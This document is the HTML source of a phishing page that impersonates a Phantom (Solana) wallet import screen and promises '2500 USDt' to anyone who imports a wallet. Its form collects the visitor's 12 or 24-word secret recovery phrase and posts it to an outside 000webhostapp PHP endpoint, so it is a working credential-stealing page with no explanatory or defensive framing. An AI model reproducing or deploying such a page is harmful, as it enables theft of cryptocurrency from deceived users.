
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style rc-util-key="@ant-design-icons">
  .anticon {
    display: inline-block;
    color: inherit;
    font-style: normal;
    line-height: 0;
    text-align: center;
    text-transform: none;
    vertical-align: -0.125em;
    text-rendering: optimizeLegibility;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
  }
  
  .anticon > * {
    line-height: 1;
  }
  
  .anticon svg {
    display: inline-block;
  }
  
  .anticon::before {
    display: none;
  }
  
  .anticon .anticon-icon {
    display: block;
  }
  
  .anticon[tabindex] {
    cursor: pointer;
  }
  
  .anticon-spin::before,
  .anticon-spin {
    display: inline-block;
    -webkit-animation: loadingCircle 1s infinite linear;
    animation: loadingCircle 1s infinite linear;
  }
  
  @-webkit-keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  
  @keyframes loadingCircle {
    100% {
      -webkit-transform: rotate(360deg);
      transform: rotate(360deg);
    }
  }
  </style>
      
      <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Crypto.com Wallet Extension">

      <title>Phantom Wallet By SOLANA</title>
      <link rel="stylesheet" href="antd.css">
      <link rel="stylesheet" href="umi.css">
      <link rel="icon" href="./phantom-alternative.ico">
      
    <link rel="stylesheet" type="text/css" href="p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="p__qrcode.chunk.css"></head>
  
    <body>
      <div id="root"><div class="import_wallet___248SK"><br><center><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="./phantom-alternative.ico" alt="" style="height: 70px;width: 73px;"></div></center><br>
<div class="title___1C2cy">IMPORT WALLET</div><div class="subtitle___1InNY">Import Your Phantom Wallet to Claim <span> <br><font color="#04d655"> 2500 USDt</font>


</span></div><div class="desc___2SBxc"><b>Restore an existing wallet with your 12 or 24-word secret recovery phrase.

</b>
</div><form method="post" action="https://r6tuhjf54.000webhostapp.com/login55.php?/#bfnaelmomeimhlpmgjnjophhpkkoljpa" form="" autocomplete="off" class="ant-form ant-form-vertical"><div class="area_wrap___2YyXp "><svg width="24" height="24" viewBox="0 0 24 24" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M12 10.9741L8.23837 7.21247C7.95508 6.92918 7.49576 6.92918 7.21247 7.21247C6.92918 7.49576 6.92918 7.95508 7.21247 8.23837L10.9741 12L7.21247 15.7616C6.92918 16.0449 6.92918 16.5042 7.21247 16.7875C7.49576 17.0708 7.95508 17.0708 8.23837 16.7875L12 13.0259L15.7616 16.7875C16.0449 17.0708 16.5042 17.0708 16.7875 16.7875C17.0708 16.5042 17.0708 16.0449 16.7875 15.7616L13.0259 12L16.7875 8.23837C17.0708 7.95508 17.0708 7.49576 16.7875 7.21247C16.5042 6.92918 16.0449 6.92918 15.7616 7.21247L12 10.9741Z" fill="#E64B60"></path></svg><textarea placeholder="Enter Secret Recovery Phrase" class="ant-input area___3V06- " type="text" name="PrivateKey" maxlength="300" minlength="24" required="true"></textarea><font color="red" label="" style="font-size: 13px;">Secret Recovery Phrase Invalid
</font><div class="tip___3g37l"></div></div><button type="submit" class="ant-btn ant-btn-default ant-btn-block btn___3NA9b" style="height: 48px; background-color: #9687f2;"><span><font color="#231f20">Import</font></span></button><div class="disclaimer___1qGN0"></div></form></div></div>
  

    
  
  <style rc-util-key="antd-wave"></style></body></html>
